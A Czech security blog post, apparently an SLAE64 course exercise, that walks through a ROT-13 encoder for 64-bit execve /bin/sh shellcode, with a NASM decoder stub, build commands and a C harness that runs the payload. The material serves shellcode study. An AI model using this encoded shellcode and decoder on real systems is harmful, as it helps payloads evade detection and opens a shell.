64bitový Custom Encoder

Ve čtvrtém textu této 64bitové série bude vytvořeno custom encoding schéma fungující na principu insertion encoderu s execve-stack jako shellcodem.

Pro custom encoder použiji velmi jednoduchou šifru ROT-13 pro každý byte.

Source: wikipedia.com
#!/usr/bin/env python
# Filename: encoder.py
# Author: SLAE64-14209
 
shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05")
 
rot = 13
max = 256 - rot
 
encoded = ""
encoded2 = []
 
for x in bytearray(shellcode):
  if x < max:
    encoded += '\\x%02x' % (x + rot)
    encoded2.append('0x%02x' % (x + rot))
  else:
    encoded += '\\x%02x' % (rot - 256 + x)
    encoded2.append('0x%02x' % (rot - 256 + x))
 
print "Encoded:\n%s\n" % encoded
 
print "Encoded2:\n%s\n" % ','.join(encoded2)

Encodovaný shellcode:

\x55\x3e\xcd\x5d\x55\xc8\x3c\x6f\x76\x7b\x3c\x3c\x80\x75\x60\x55\x96\xf4\x5d\x55\x96\xef\x64\x55\x96\xf3\x55\x90\xcd\x48\x1c\x12

Vytvořený nasm soubor:

# Filename: decoder.nasm
# Author: SLAE64-14209
 
global _start
section .text
_start:
 
jmp short call_shellcode
 
decoder:
pop rsi ; pop address of the shellcode in RSI
xor rcx, rcx ; zeroize RCX register
mov cl, 32 ; counter = 32 (length of the shellcode)
 
decode:
cmp byte [rsi], 0xD ; compare if is possible to substract value 13
jl max_reached ; jump if less -> max_reached
sub byte [rsi], 0xD ; substract value 13
jmp short shellcode
 
max_reached:
xor rdx, rdx ; zeroize EDX register
mov dl, 0xD ; set 13 into RDX
sub dl, byte [rsi] ; 13 - byte value of the shellcode
xor rbx, rbx ; zeroize RBX register
mov bl, 0xff ; 0xff = 255 
inc rbx ; = 256
sub bx, dx ; 256 - (13 - byte value of the shellcode)
mov byte [rsi], bl ; move bl into RSI
 
shellcode:
inc rsi ; move to next byte
loop decode ; loop "decode"
jmp short EncodedShellcode
 
call_shellcode:
 
call decoder
EncodedShellcode: db 0x55,0x3e,0xcd,0x5d,0x55,0xc8,0x3c,0x6f,0x76,0x7b,0x3c,0x3c,0x80,0x75,0x60,0x55,0x96,0xf4,0x5d,0x55,0x96,0xef,0x64,0x55,0x96,0xf3,0x55,0x90,0xcd,0x48,0x1c,0x12

Zkompilujeme:

 • nasm -f elf64 -o decoder.o decoder.nasm
 • ld decoder.o -o decoder
 • objdump -d decoder -M intel
  • no nullbytes
 • objdump -d ./decoder|grep ‘[0-9a-f]:’|grep -v ‘file’|cut -f2 -d:|cut -f1-6 -d’ ‘|tr -s ‘ ‘|tr ‘\t’ ‘ ‘|sed ‘s/ $//g’|sed ‘s/ /\\x/g’|paste -d ” -s |sed ‘s/^/”/’|sed ‘s/$/”/g’

“\xeb\x2b\x5e\x48\x31\xc9\xb1\x20\x80\x3e\x0d\x7c\x05\x80\x2e\x0d\xeb\x14\x48\x31\xd2\xb2\x0d\x2a\x16\x48\x31\xdb\xb3\xff\x48\xff\xc3\x66\x29\xd3\x88\x1e\x48\xff\xc6\xe2\xdd\xeb\x05\xe8\xd0\xff\xff\xff\x55\x3e\xcd\x5d\x55\xc8\x3c\x6f\x76\x7b\x3c\x3c\x80\x75\x60\x55\x96\xf4\x5d\x55\x96\xef\x64\x55\x96\xf3\x55\x90\xcd\x48\x1c\x12”


#include <stdio.h>
#include <string.h>
 
unsigned char code[] =
// Decoder stub:
"\xeb\x2b\x5e\x48\x31\xc9\xb1\x20\x80\x3e\x0d\x7c\x05\x80\x2e\x0d\xeb\x14\x48\x31\xd2\xb2\x0d\x2a\x16\x48\x31\xdb\xb3\xff\x48\xff\xc3\x66\x29\xd3\x88\x1e\x48\xff\xc6\xe2\xdd\xeb\x05\xe8\xd0\xff\xff\xff\x55\x3e\xcd\x5d\x55\xc8\x3c\x6f\x76\x7b\x3c\x3c\x80\x75\x60\x55\x96\xf4\x5d\x55\x96\xef\x64\x55\x96\xf3\x55\x90\xcd\x48\x1c\x12"
// Encoded shellcode:
"\x55\x3e\xcd\x5d\x55\xc8\x3c\x6f\x76\x7b\x3c\x3c\x80\x75\x60\x55\x96\xf4\x5d\x55\x96\xef\x64\x55\x96\xf3\x55\x90\xcd\x48\x1c\x12";
 
int main(void) {
  printf("Shellcode Length: %d\n", strlen(code));
  int (*ret)() = (int(*)())code;
  ret();
}
 • gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
 • ./shellcode

Všechny použité soubory můžete nalézt zde: https://github.com/Pal1Sec/SLAE64

Naše služby

Penetrační testování infrastruktury

Skenování zranitelností webových aplikací a interní infrastruktury

Testování pomocí metod sociálního inženýrství

Testování Wi-Fi sítí

Šifrovaný telefon

Rušičky odposlechů

Šifrovaný disk

Penetrační testování webových aplikací

Konzultace IT bezpečnosti

Vyhledávání odposlechů

Následující příspěvek
Analýza vybraných 64bitových MSFvenom shellcodů
Předchozí příspěvek
Analýza 64bitového Egghunter Shellcodu

Podobná témata

Menu